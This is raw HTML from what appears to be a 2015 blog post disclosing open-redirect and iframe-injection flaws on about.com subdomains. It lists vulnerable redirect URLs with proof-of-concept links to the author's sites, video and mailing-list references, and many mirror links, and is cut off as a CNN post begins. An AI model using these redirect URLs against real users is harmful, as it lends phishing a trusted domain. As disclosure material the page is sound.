<a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://inventors.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inventors.about.com/gi/<wbr></wbr>dynamic/offsite.htm?zi=1/XJ/<wbr></wbr>Ya&sdn=internationalinvest&<wbr></wbr>cdn=prep&tm=2&f=21&tt=14&bt=0&<wbr></wbr>bts=1&zu=http%3A//<wbr></wbr>itinfotechnology.wordpress.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://sbinformation.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://sbinformation.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://ancienthistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//inzeed.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ancienthistory.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//inzeed.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://specialchildren.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<a href="http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/</span></a></div>
<div style="margin: 0px;">
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html</span></a></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(5) About (about.com) Open Redirect Multiple (Dest Redirect Privilege Escalation) Security Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">About Group online web application has a computer cyber security bug problem. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Use one of webpages for the following tests. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope/" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a>". Suppose that this webpage is malicious.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.instagram.com/<wbr></wbr>facebook/craigslist</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.inzeed.com/<wbr></wbr>essayjeans/poems/thatday.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://paypal.com/imgur/xinhuanet" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://paypal.com/<wbr></wbr>imgur/xinhuanet</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://www.inzeed.<wbr></wbr>com/netflix/stackoverflow</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://wzus1.index.about.com/r?t=v&d=im&u=http%3A%2F%2Ft.co%2fxvideos%2fsoso%2f%naver%2fkickass.so" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http%3A%2F%2Ft.<wbr></wbr>co%2fxvideos%2fsoso%2f%naver%<wbr></wbr>2fkickass.so</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://wzus1.index.about.com/r?t=v&d=im&u=http://www.diebiyi.com/xhamster/diply/onclickads.net" target="_blank">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http://www.<wbr></wbr>diebiyi.com/xhamster/diply/<wbr></wbr>onclickads.net</a> </span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Feb/9"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Feb/9</span></a></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/02/02/4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/02/4</span></a></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html</span></a></div>
</div>
<div style="margin: 0px;">
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html</span></a></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-iframe-injection-security-attacks-about-com-open-redirect-security-vulnerabilities/">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://hackertopic.wordpress.com/2015/02/03/about-group-xss-xfs/" target="_blank">https://hackertopic.wordpress.<wbr></wbr>com/2015/02/03/about-group-<wbr></wbr>xss-xfs/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120845059171/about-group-xss-xfs" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120845059171/about-group-<wbr></wbr>xss-xfs</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itprompt.blogspot.com/2015/06/about-group-xss-xfs.html">http://itprompt.blogspot.com/<wbr></wbr>2015/06/about-group-xss-xfs.<wbr></wbr>html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://itinfotechnology.wordpress.com/2015/03/24/about-group-%E8%B6%85%E8%BF%87-99-88-%E7%9A%84%E9%93%BE%E6%8E%A5%E5%AE%B9%E6%98%93%E9%81%AD%E5%8F%97-xss-%E5%92%8C-xfs-%E6%94%BB%E5%87%BB/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/03/24/about-group</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/803853789734793">https://www.facebook.com/websecuritiesnews/posts/803853789734793</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://twitter.com/essayjeans/status/607137800383655936"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/607137800383655936</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512015566409245/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512015566409245/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/pcwebsecurities/posts/687872271358693">https://www.facebook.com/pcwebsecurities/posts/687872271358693</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5">http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/">https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br class="Apple-interchange-newline" /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-56833706987804301952015-06-05T23:44:00.000-07:002015-06-05T23:44:49.560-07:00CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
